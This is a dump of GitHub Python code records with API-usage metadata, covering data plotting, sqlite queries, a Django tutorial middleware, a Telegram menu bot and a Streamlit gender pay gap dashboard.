"line_number": 71, "usage_type": "call"}, {"api_name": "boto3.dynamodb", "line_number": 71, "usage_type": "attribute"}, {"api_name": "decimal.Inexact", "line_number": 72, "usage_type": "attribute"}, {"api_name": "decimal.Rounded", "line_number": 73, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 74, "usage_type": "call"}, {"api_name": "boto3.dynamodb.conditions.Key", "line_number": 94, "usage_type": "call"}, {"api_name": "boto3.dynamodb.conditions.Attr", "line_number": 95, "usage_type": "call"}, {"api_name": "boto3.dynamodb.conditions.Attr", "line_number": 116, "usage_type": "call"}, {"api_name": "boto3.dynamodb.conditions.Attr", "line_number": 118, "usage_type": "call"}, {"api_name": "boto3.dynamodb.conditions.Key", "line_number": 123, "usage_type": "call"}, {"api_name": "datetime.date.fromtimestamp", "line_number": 135, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 135, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 135, "usage_type": "call"}, {"api_name": "datetime.date.fromtimestamp", "line_number": 137, 
"usage_type": "call"}, {"api_name": "datetime.date", "line_number": 137, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 137, "usage_type": "call"}, {"api_name": "boto3.dynamodb.conditions.Key", "line_number": 157, "usage_type": "call"}, {"api_name": "boto3.dynamodb.conditions.Attr", "line_number": 158, "usage_type": "call"}]} +{"seq_id": "4160611138", "text": "import csv\nfrom fileinput import filename\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\n\nfilename = 'Chapter16/csv/Chicago.csv' #assign the csv file to filename\nwith open(filename) as file: #we assign the object of filename to file\n reader = csv.reader(file) #we call csv.reader and pass it the file object as an argument to create a reader oobject\n header_row = next(reader) #Store data from the first row with next function\n print(header_row)\n\n for index, column_header in enumerate(header_row): #Use this for loop/enumerate to find the indeces of date and temp min. (4,6)\n print(index, column_header)\n \n dates, highs, lows = [], [], [] # create a list\n for row in reader: # find the rows in reader\n if row[5] == '': # if the values in it are blank\n blank = (row[5]) #assign them to a variable that doesn't matter\n elif row[6] == '':\n blank = (row[6])\n else:\n low = int(row[6])\n lows.append(low)\n high = int(row[5]) #change the string to an int if its not blank and assign to variable high\n highs.append(high) #add the aformentioned variable to the list\n \n for row in reader:\n current_date = datetime.strptime(row[4], '%Y-%m-%d')\n dates.append(current_date)\n for i in dates:\n print(i) # I cannot figure out why this doesnt work sadly.\n print(highs) #print them to make sure they work (they do, just numbers now)\n print(lows)\n print(len(highs)) # find the number of values in the list (599, or roughly )\n\n\n\n\n #plotting the high temperatures\n plt.style.use('seaborn')\n fig, ax = plt.subplots()\n ax.plot(highs, c='orange')\n ax.plot(lows, c='blue')\n\n #Format plot\n ax.set_title(\"Daily high and low Temperatures, Chicago, 2022\", fontsize = 24)\n ax.set_xlabel('', fontsize =16)\n ax.set_ylabel(\"Temperature (F)\", fontsize = 16)\n ax.tick_params(axis = \"both\", which= \"major\", labelsize=16)\n\n plt.show()\n\n\n", "repo_name": "RiggityRussell/CIT228", "sub_path": "Chapter16/chicago_csv.py", "file_name": "chicago_csv.py", "file_ext": "py", "file_size_in_byte": 2007, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fileinput.filename", "line_number": 6, "usage_type": "name"}, {"api_name": "fileinput.filename", "line_number": 7, "usage_type": "argument"}, {"api_name": "csv.reader", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 40, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "9582120465", "text": "#!/usr/bin/env python3\n# 
-*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 23 12:38:50 2019\n\n@author: michaelboles\n\"\"\"\n\n# set up working directory\nimport os\nos.chdir('/Users/michaelboles/Michael/Coding/2019/Realestate') # Mac\n#os.chdir('C:\\\\Users\\\\bolesmi\\\\Lam\\\\Coding\\\\Python\\\\2019\\\\Realestate') # PC\n\n# import data\nimport pandas as pd\ndata = pd.read_csv('./Data/listings/data_all_price_predictions.csv')\n\n# remind myself what the column names are\ndata.columns\n\n# create in-memory sqlite database, add dataframe\nfrom sqlalchemy import create_engine\nengine = create_engine('sqlite://', echo = False)\ndata.to_sql('Realestate', con=engine)\n\n# query database\nengine.execute(\"SELECT * FROM Realestate\").fetchall() # gets everything\nengine.execute('SELECT * FROM Realestate WHERE Zip = 94618').fetchall() # matches a zipcode\n\n# create a list from sql query \n# returns list of rowproxy objects, omits column names - why is this so hard\nrockridge = engine.execute('SELECT * FROM Realestate WHERE Zip = 94618').fetchall() # matches a zipcode\n", "repo_name": "mboles01/Realestate", "sub_path": "Old/SQL/sqlite.py", "file_name": "sqlite.py", "file_ext": "py", "file_size_in_byte": 1029, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.chdir", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "37541203182", "text": "print('='*6, 'ANO BISSEXTO', '='*6)\nprint('')\nfrom datetime import date # Biblioteca para capturar o ano atual do sistema.\na = int(input(\"Qual ano quer analisar? Ou digite 0 para o ano atual: \"))\n# Se o ano for divisível por 4 e tiver resto igual 0,\n# ou divisível por 100 tiver resto diferente de 0,\n# ou divisível por 400 tiver resto igual a 0.\nif a == 0:\n a = date.today().year # Para capturar o ano atual com o usuário digitando 0.\nif a % 4 == 0 and a % 100 != 0 or a % 400 == 0:\n print('O Ano {} é BISSEXTO.'.format(a))\nelse:\n print('O Ano {} NÃO é BISSEXTO.'.format(a))\n\n\n\n", "repo_name": "Edcarlos-Oliveira/PythonMundo1", "sub_path": "des032AnoBi.py", "file_name": "des032AnoBi.py", "file_ext": "py", "file_size_in_byte": 595, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.date.today", "line_number": 9, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "73708577794", "text": "#!/usr/bin/env python3\n\nimport argparse, re, os\nimport kmertools as kt\t\t#Available at https://github.com/jtladner/Modules\nimport fastatools as ft\t\t#Available at https://github.com/jtladner/Modules\nimport inout as io\t\t#Available at https://github.com/jtladner/Modules\nimport pandas as pd\nimport seaborn as sns\n\nfrom matplotlib import pyplot as plt\ntypeface='Arial'\n\n\n#Example command: coverage_per_seq_violinplot.py -d /Users/colleenung/Documents/197911_InfluenzavirusA/HA/SW_SC_noC/t0.200/197911_id_70_9_SWSC-x9-y30-t0.200.fasta -c /Users/colleenung/Documents/197911_InfluenzavirusA/HA/197911_id_70_9 -k 9 -t 0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,0.95 --swCtoS -o 197911_id_70_9_coverage_per_seq_violinplot.png -s 197911_id_70_9_coverage_per_seq_stats.txt\n\nparser = argparse.ArgumentParser(description='''A script that will generate violin plot(s) to visualize the distribution of kmer coverage 
\n\t\t\t\t\t\tin the design on a per sequence basis. Can generate multiple violin plots, with each representing a different Xmer \n\t\t\t\t\t\tthreshold.''')\n\nparser.add_argument(\"-d\", \"--design\", metavar='\\b', help=\"Input design file. If looking at multiple Xmer thresholds, only provide path to one of the design files. Assuming designs share the same naming structure and are located in a directory containing subdirectories for each Xmer target threshold.\")\nparser.add_argument(\"-c\", \"--cluster\", metavar='\\b', help=\"Input cluster file to look at kmer coverage on a per sequence basis. Note, cluster names must end with cluster number.\")\n\nparser.add_argument(\"-k\", \"--ksize\", default=9, type=int, metavar='\\b', help=\"Size of kmer to use for looking at kmer coverage in the design [default: 9].\")\nparser.add_argument(\"-t\", \"--targets\", default=\"0.5,0.75,1\", metavar='\\b', help=\"Target thresholds to generate violin plots for. [default: 0.5,0.75,1]\")\nparser.add_argument(\"-o\", \"--output\", default=\"coverage_per_seq_violinplot.png\", metavar='\\b', help=\"Name of output PNG file with violin plot(s). [default: coverage_per_seq_violinplot.png]\")\nparser.add_argument(\"-s\", \"--statsoutput\", default=\"coverage_per_seq_violinplot.txt\", metavar='\\b', help=\"Name of output txt file with descriptive statistics. [default: coverage_per_seq_violinplot.txt]\")\nparser.add_argument(\"--swCtoS\", default=False, action=\"store_true\", help=\"Use this flag if Cysteine residues were converted to Serine residues in the SW portion of the design.\")\nparser.add_argument(\"-b\", \"--batchMode\", default=None, metavar='\\b', help=\"You can use this flag to run the script in batch mode. If used, it should be followed by the path to a tsv file with two columns and one row per design. The first column should correspond to --design and the second to --cluster. In this mode, the output filenames will be generated based on the input file names. [default: None]\")\n\n#New argument group to underscore that these arguments are required despite being provided with flags\n#reqArgs = parser.add_argument_group(\"required arguments\")\n\nargs = parser.parse_args()\n\n\n#Parsing target thresholds\ntargetThresh = sorted(list(set([float(x) for x in args.targets.split(\",\")])))\n\n#Prep for batch mode\nif args.batchMode:\n\tinputD = io.fileDict(args.batchMode, header=False)\nelse:\n\tinputD = {args.design:args.cluster}\n\n# Step through each design/cluster pair\nfor design, cluster in inputD.items():\n\t\n\t# Specify output names if running in batch mode\n\tif args.batchMode:\n\t\targs.output = \"%s_%s_vp.png\" % (os.path.basename(cluster), args.targets)\n\t\targs.statsoutput = \"%s_%s_vpStats.tsv\" % (os.path.basename(cluster), args.targets)\n\t\n\t#Reading in fasta file (in this case, cluster file). 
Returns two lists, the first containing seq names and the second containing its sequences.\n\tnames, seqs = ft.read_fasta_lists(cluster)\n\n\txthrList=[]\n\tcoverageperseqList=[]\n\tfor thr in targetThresh:\n\t\t#Using path of input design file to find design files for other desired target threshold(s), if applicable\n\t\tsearchstr= \".*/t([\\d.]*)/.*\"\n\t\tregexresult= re.search(searchstr, design)\n\t\tdesignPath= re.sub(str(regexresult.group(1)), (\"%.3f\" % (thr)), design)\n\n\t\t#Creating set of all unique kmers within design\n\t\tdesignkSet= kt.kmerSetFasta(designPath, args.ksize, filter=[])\n\n\t\tfor s in seqs:\n\t\t\tif args.swCtoS:\n\t\t\t\ts = s.replace(\"C\", \"S\")\n\t\t\t#Creating set of all unique kmers within sequence\n\t\t\tsSet = kt.kmerSet(s, args.ksize, filter=[\"X\"])\n\t\t\tif len(sSet)>0:\n\t\t\t\txmersCovered= sSet.intersection(designkSet)\n\t\t\t\tpercentCovered= (len(xmersCovered) / len(sSet))*100\n\t\t\t\txthrList.append((\"%.3f\" % (thr)))\n\t\t\t\tcoverageperseqList.append(percentCovered)\n\n\tlabelY= \"%% %dmers covered per sequence\" % args.ksize\n\tdataDict= {\"Xmer Threshold\":xthrList, labelY:coverageperseqList}\n\t#Creating pandas dataframe from dictionary\n\tdf = pd.DataFrame(dataDict)\n\n\n\t#Generating violin plot from pandas dataframe using Seaborn\n\tfig, ax = plt.subplots(1,1,figsize=(10,10),facecolor='w')\n\tsns.violinplot(x=df[\"Xmer Threshold\"], y=df[labelY], palette=\"Set3\", ax=ax)\n\tax.set_ylabel(labelY)\n\tax.set_ylim(0,100)\n\tax.set_xlabel(\"Xmer Threshold\")\n\tfig.savefig(args.output, bbox_inches='tight', dpi=200)\n\tplt.close(fig=fig)\n\n\n\t#Writing out file with descriptive statistics\n\twith open(args.statsoutput, \"w\") as fout:\n\t\tline1= \"\\tMaximum\\tQ3\\tMedian\\tQ1\\tMinimum\\tIQR\"\n\t\tfout.write(line1)\n\t\n\t\tfor thr in targetThresh:\n\t\t\tthrDF= df.loc[df[\"Xmer Threshold\"] == (\"%.3f\" % (thr))]\n\t\t\n\t\t\tmaximum= thrDF[labelY].max()\n\t\t\tq3= thrDF[labelY].quantile(q=0.75, interpolation='midpoint')\n\t\t\tmedian= thrDF[labelY].quantile(q=0.5, interpolation='midpoint')\n\t\t\tq1= thrDF[labelY].quantile(q=0.25, interpolation='midpoint')\n\t\t\tminimum= thrDF[labelY].min()\n\t\t\tIQR= q3-q1\n\t\t\n\t\t\tline2= \"\\n%.3f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\" % (thr,maximum,q3,median,q1,minimum,IQR)\n\t\t\tfout.write(line2)", "repo_name": "LadnerLab/Library-Design", "sub_path": "extensions/coverage_per_seq_violinplot.py", "file_name": "coverage_per_seq_violinplot.py", "file_ext": "py", "file_size_in_byte": 5732, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 16, "usage_type": "call"}, {"api_name": "inout.fileDict", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "fastatools.read_fasta_lists", "line_number": 54, "usage_type": "call"}, {"api_name": "re.search", "line_number": 61, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 62, "usage_type": "call"}, {"api_name": "kmertools.kmerSetFasta", "line_number": 65, "usage_type": "call"}, {"api_name": "kmertools.kmerSet", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 81, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot.subplots", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "seaborn.violinplot", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}]} +{"seq_id": "16943469616", "text": "from django.contrib.auth.models import AnonymousUser\n\nfrom .models import User\n\nclass DummyAuthBackend:\n \"\"\" \"\"\"\n\ndef get_user(get_response):\n def middleware(request):\n email = request.headers.get('user')\n if email:\n request.user = User.objects.filter(email=email).first()\n if request.user is None:\n raise ValueError(\"User not found\")\n else:\n request.user = AnonymousUser()\n\n return get_response(request)\n\n return middleware\n", "repo_name": "osohq/oso-django-integration", "sub_path": "oso_tutorial/expenses/authorization.py", "file_name": "authorization.py", "file_ext": "py", "file_size_in_byte": 510, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "models.User.objects.filter", "line_number": 12, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 12, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.AnonymousUser", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "74348435395", "text": "import numpy as np\nfrom matplotlib import pyplot as plt\nimport librosa\n\nfrom postprocess_utils import seg_metrics\nfrom utils import extract_features_melspec\n\naudio_filename = \"./samples/seg-test16.wav\"\nfeatures_filename = \"./samples/seg-test_features.npy\"\n# predictions_filename = \"samples/predictions_2018-05-24_17-48.npy\"\n\naudio, sr = librosa.load(audio_filename, sr=16000)\n# predictions = np.load(predictions_filename)\n# features = np.load(features_filename)\nfeatures = extract_features_melspec(audio, sr)\n\nprint(\"AUDIO\", audio.shape)\n# print(\"PREDICTIONS\", predictions.shape)\nprint(\"FEATURES\", features.shape)\n\ntimeseries_length = 100\nhop_length = 25\n\n# preds = deoverlap_predictions(predictions, features, hop_length)\n# norm_preds = defragment_vad(preds)\n\n# reference = [(6.42, 6.85), (13.49, 13.78)]\nreference = [(0, 6.42), (6.42, 13.49), (13.49, 20.43)]\n\n# lium = [(13.55, 13.67)]\nlium = [(0, 13.55), (13.55, 20.43)]\n\nref_plot = [0.1 for _ in range(len(audio))]\nfor r in reference:\n sr = 16000\n (start, end) = librosa.core.time_to_samples(r, sr=sr)\n start = max((0, start))\n end = min((len(audio), end))\n print(\"REF\", start, end)\n ref_plot[start:end] = [0.9 for _ in range(end - start)]\nprint(len(ref_plot))\n\n\nlium_seg = [0 for _ in range(len(audio))]\nfor l in lium:\n sr = 16000\n (start, end) = librosa.core.time_to_samples(l, sr=sr)\n start = max((0, start))\n end = min((len(audio), end))\n print(\"LIUM\", start, end)\n lium_seg[start:end] = [1 for _ in range(end - start)]\nprint(len(lium_seg))\n\nseg_metrics(lium, reference)\n\nfig, (\n (ax1),\n (ax2),\n # (ax3)\n) = plt.subplots(2, 1)\n\nax1.plot(audio)\nax1.set_title('skaņas līkne', fontsize='large')\n\nax2.plot(lium_seg)\nax2.plot(ref_plot)\nax2.set_title('LIUM rezultāti', fontsize='large')\n\n# ax3.plot(norm_preds)\n# ax3.plot(ref_plot)\n# ax3.set_title('normalizēti rezultāti', fontsize='large')\n\nplt.show()\n\n\n\n", "repo_name": "dmednis/speaker-segmenter", "sub_path": 
"test_seg.py", "file_name": "test_seg.py", "file_ext": "py", "file_size_in_byte": 1908, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "librosa.load", "line_number": 12, "usage_type": "call"}, {"api_name": "utils.extract_features_melspec", "line_number": 15, "usage_type": "call"}, {"api_name": "librosa.core.time_to_samples", "line_number": 36, "usage_type": "call"}, {"api_name": "librosa.core", "line_number": 36, "usage_type": "attribute"}, {"api_name": "librosa.core.time_to_samples", "line_number": 47, "usage_type": "call"}, {"api_name": "librosa.core", "line_number": 47, "usage_type": "attribute"}, {"api_name": "postprocess_utils.seg_metrics", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}]} +{"seq_id": "5406651356", "text": "from django.shortcuts import render\nfrom pymongo import MongoClient\nfrom models import *\n\n# Create your views here.\n\ndef saveRoute():\n client = MongoClient(\"localhost\", 27017)\n db = client.scrapping\n cursor = db.route_data.find()\n for each in cursor:\n r = RouteData(\n depTimeString=str(each.get('depTimeString')),\n maxUpperColumns=str(each.get('maxUpperColumns')),\n fromCity=str(each.get('FromCity')),\n maxLowerColumns=str(each.get('maxLowerColumns')),\n maxLowerRows=str(each.get('maxLowerRows')),\n DPInformationList=each.get('DPInformationList'),\n toCity=str(each.get('ToCity')),\n maxUpperRows=str(each.get('maxUpperRows')),\n vehicleType=str(each.get('vehicleType')),\n BPInformationList=each.get('BPInformationList'),\n travelDate=str(each.get('travelDate')),\n busType=str(each.get('busType')),\n MPax=str(each.get('MPax')),\n serviceName=str(each.get('serviceName')),\n seatList=str(each.get('seatlist')),\n toCityId=str(each.get('ToCityId')),\n operatorId=str(each.get('operatorId')),\n amenities=str(each.get('amenties')),\n notes=str(each.get('Notes')),\n dateOFJourney=str(each.get('DateOfJourney')),\n routeId=str(each.get('RouteId')),\n travels=str(each.get('Travels')),\n arrTime=str(each.get('arrTime')),\n arrTimeString=str(each.get('arrTimeString')),\n serviceNumber=str(each.get('serviceNo')),\n aes=str(each.get('aes')),\n mxSPrTxn=str(each.get('mxSPrTxn')),\n depTime=str(each.get('depTime')),\n isBPMapLinkShown=str(each.get('isBPMapLinkShown')),\n fromCityId=str(each.get('FromCityId')),\n param42=each.get('param42')\n )\n r.save()\n # break\n\n\ndef saveTrip():\n client = MongoClient(\"localhost\", 27017)\n db = client.scrapping\n cursor = db.trip.find()\n\n for each in cursor:\n data = each.get('data')\n t = TripData(\n status=str(each.get('status')),\n defaultSorting=each.get('DefaultSorting'),\n amenitiesData=str(each.get('amenitiesData')),\n message=str(each.get('message'))\n )\n t.save()\n try:\n for singleData in data:\n try:\n tsd = TripSingleData(\n tripData=t,\n DPList=singleData.get('DPLst'),\n vt=str(singleData.get('vt')),\n busType=str(singleData.get('BsTp')),\n Tips=str(singleData.get('Tips')),\n BsSvid=str(singleData.get('BsSvId')),\n Sort=str(singleData.get('Sort')),\n IsDPA=str(singleData.get('IsDPA')),\n NSA=str(singleData.get('NSA')),\n params42=singleData.get('param42'),\n serviceName=str(singleData.get('serviceName')),\n 
giry=str(singleData.get('Glry')),\n RbPrefCode=str(singleData.get('RbPrefCode')),\n WnSt=str(singleData.get('WnSt')),\n DpTm=str(singleData.get('DpTm')),\n IsAC=str(singleData.get('IsAc')),\n IsNAc=str(singleData.get('IsNAc')),\n RtId=str(singleData.get('RtId')),\n IsSpF=str(singleData.get('IsSpF')),\n IsSlpr=str(singleData.get('IsSlpr')),\n serviceId=str(singleData.get('serviceId')),\n FareList=singleData.get('FrLst'),\n Ament=singleData.get('Ament'),\n OpId=str(singleData.get('OpId')),\n BPList=singleData.get('BPLst'),\n IsMTE=str(singleData.get('IsMTE')),\n Rtg=singleData.get('Rtg'),\n IsBpDpSearch=str(singleData.get('IsBpDpSearch')),\n jDur=str(singleData.get('jDur')),\n isStr=str(singleData.get('IsStr')),\n Tvs=str(singleData.get('Tvs')),\n Cmpg=singleData.get('Cmpg'),\n BsSt=str(singleData.get('BsSt')),\n ArTm=str(singleData.get('ArTm'))\n )\n tsd.save()\n except:\n pass\n except:\n pass\n # break\n # break\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "ankittube/dbtransfer", "sub_path": "transferdb/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4638, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pymongo.MongoClient", "line_number": 8, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "40037380553", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport logging\nimport telegram\nfrom mensa import fetch_all_menus, overwrite_current_menus\nfrom time import sleep\nimport sys\nfrom datetime import datetime\nfrom config import Config\nfrom utils import format_menus\nimport asyncio\n\n\nasync def send_menus(bot, config):\n \"\"\"Run the bot.\"\"\"\n date = datetime.today()\n overwrite_current_menus(config)\n mensa_menus = fetch_all_menus(config, date)\n users_mensas = config.get_database().get_all_user_and_mensas()\n print(\"Sending menus in %d messages\" % (len(users_mensas)))\n for cid, mensa in users_mensas:\n menus = mensa_menus[mensa]\n if not menus:\n continue\n await send_message(bot, cid, format_menus(mensa, menus, date))\n\n\nasync def send_message_to_all(bot, users, msg):\n print(\"Sending message to all %d users\" % len(users))\n for cid in users:\n await send_message(bot, cid, msg)\n\n\nasync def send_message(bot, chat_id, message):\n try:\n await bot.send_message(chat_id=chat_id, text=message,\n parse_mode='HTML')\n except Exception as ex:\n print(\"Could not send message to\", chat_id, str(ex))\n sleep(0.05) # avoiding flood limits\n\n\nasync def main():\n if len(sys.argv) == 1:\n print(f\"Usage: python3 {__file__} [message to all]\")\n sys.exit()\n config = Config(sys.argv[1])\n bot = telegram.Bot(config.get_token())\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - '\n '%(message)s')\n async with bot:\n if len(sys.argv) > 2:\n await send_message_to_all(bot, config.get_database().get_users(),\n \" \".join(sys.argv[2:]))\n else:\n await send_menus(bot, config)\n\nif __name__ == '__main__':\n asyncio.run(main())\n", "repo_name": "dnrhead/mensa_bot", "sub_path": "Bot/send_messages.py", "file_name": "send_messages.py", "file_ext": "py", "file_size_in_byte": 1861, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime.today", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 16, "usage_type": "name"}, {"api_name": 
"mensa.overwrite_current_menus", "line_number": 17, "usage_type": "call"}, {"api_name": "mensa.fetch_all_menus", "line_number": 18, "usage_type": "call"}, {"api_name": "config.get_database", "line_number": 19, "usage_type": "call"}, {"api_name": "utils.format_menus", "line_number": 25, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 44, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 46, "usage_type": "call"}, {"api_name": "config.Config", "line_number": 47, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 47, "usage_type": "attribute"}, {"api_name": "telegram.Bot", "line_number": 48, "usage_type": "call"}, {"api_name": "config.get_token", "line_number": 48, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 49, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 52, "usage_type": "attribute"}, {"api_name": "config.get_database", "line_number": 53, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 54, "usage_type": "attribute"}, {"api_name": "asyncio.run", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "4710100071", "text": "import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport plotly.express as px\nimport plotly.graph_objects as go\n\n\nyears = list(range(1985, 2011))\n\nst.title('Gender Pay Gap')\nst.subheader('Data Analytics Project')\n\nst.cache_data()\ndef load_dataset():\n df=pd.read_csv(\"cleaned_gpg_v2.csv\", usecols=['year','region','relate','sex','race','marst','occ','ind','classwkr',\n 'hrswork','incwage','annhrs','hrwage','inflate','expendbase10','perconexp',\n 'potexp','potexp2','o_occ1990','o_occ1950','o_ind1950','o_ind1990'] )\n df.set_index('year',inplace=True)\n return df\n\nwith st.spinner('Loading data...'):\n df = load_dataset()\n\n\nyears = df.index.unique().tolist()\nselectyear = st.sidebar.selectbox('Select a year', years)\nst.info(f'You selected {selectyear}')\n\nst.write(df.shape)\nr = df.race.unique().tolist()\ns = df.sex.unique().tolist()\noccupation = df.occ.unique().tolist()\nindustry = df.ind.unique().tolist()\n\nrace = st.sidebar.selectbox('select a race', r )\nsex = st.sidebar.selectbox('select a sex', s )\noccup = st.sidebar.selectbox('select a occupation', occupation )\nindus = st.sidebar.selectbox('select a industry', industry )\n\nif st.sidebar.checkbox('Show raw data'):\n st.dataframe(df[(df['race']== race) & (df['sex'] == sex)][:1000])\n st.dataframe(df[(df['occ']== occup) & (df['ind'] == indus)][:1000])\n\ndf_year = df[df.index == selectyear]\n\nfig1 = px.area(x=df.index, y=df['incwage'], title=f'INCOME WAGE')\nfig2 = px.scatter( x=df.index, y=df['occ'], title=f'OCCUPATION')\nfig3 = px.bar(x=df.index, y=df['ind'], title=f'INDUSTRY')\nfig4 = px.box(x=df.index, y=df['hrswork'], title=f'HOURS WORKED')\nif st.checkbox('Show income wage'):\n st.plotly_chart(fig1, use_container_width=True)\nif st.checkbox('Show occupation'):\n st.plotly_chart(fig2, use_container_width=True)\nif st.checkbox('Show industry'):\n st.plotly_chart(fig3, use_container_width=True)\nif st.checkbox('Show hours worked'):\n st.plotly_chart(fig4, use_container_width=True)\n\nfig5 = px.scatter(df, x=\"incwage\", y=\"hrswork\", color=\"sex\", marginal_y=\"violin\", title=f'INCOME WAGE VS HOURS WORKED')\nif st.checkbox('Show income wage vs hours worked'):\n st.plotly_chart(fig5, use_container_width=True)\n\nif st.checkbox('Show group analysis'):\n fig7 = px.sunburst(df, path=['classwkr','sex'], 
values='incwage', title=f'CLASS OF WORKERS AND THEIR INCOME WAGE')\n    st.plotly_chart(fig7, use_container_width=True)\n    fig11 = px.sunburst(df,path=['marst','sex'],values='annhrs',title=f'MARITAL STATUS AND NO.OF HOURS WORKED')\n    st.plotly_chart(fig11, use_container_width=True)\n    fig14 = px.treemap(df,path=['classwkr','sex'],values='incwage')\nfig8 = px.bar(df, x=\"incwage\", y=\"expendbase10\", color=\"sex\", title=f'INCOME WAGE VS EXPENDITURE')\nif st.checkbox('Show income wage vs expenditure'):\n    st.plotly_chart(fig8, use_container_width=True)\nfig9 = px.histogram(df,x=\"o_occ1990\",y=\"sex\",title=f'OCCUPATION IN 1990')\nfig10 = px.histogram(df,x='o_occ1950',y='sex',title=f'OCCUPATION IN 1950')\nif st.checkbox('Show difference in occupation'):\n    st.plotly_chart(fig9, use_container_width=True)\n    st.plotly_chart(fig10, use_container_width=True)\nfig12 = px.violin(df,x='hrswork',y='incwage',title=f'INCOME WAGE VS HOURS WORKED')\nfig13 = px.violin(df,x='annhrs',y='hrwage',title=f'HOURLY WAGE VS NO.OF HOURS WORKED')\nif st.checkbox('Show comparison between income wage and hours wage'):\n    st.plotly_chart(fig12, use_container_width=True)\n    st.plotly_chart(fig13, use_container_width=True)\n", "repo_name": "Pranshirastogi/Data-analytics-python-course-", "sub_path": "major project/work/dap.py", "file_name": "dap.py", "file_ext": "py", "file_size_in_byte": 3575, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "streamlit.title", "line_number": 10, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 11, "usage_type": "call"}, {"api_name": "streamlit.cache_data", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "streamlit.spinner", "line_number": 21, "usage_type": "call"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 26, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 26, "usage_type": "attribute"}, {"api_name": "streamlit.info", "line_number": 27, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 29, "usage_type": "call"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 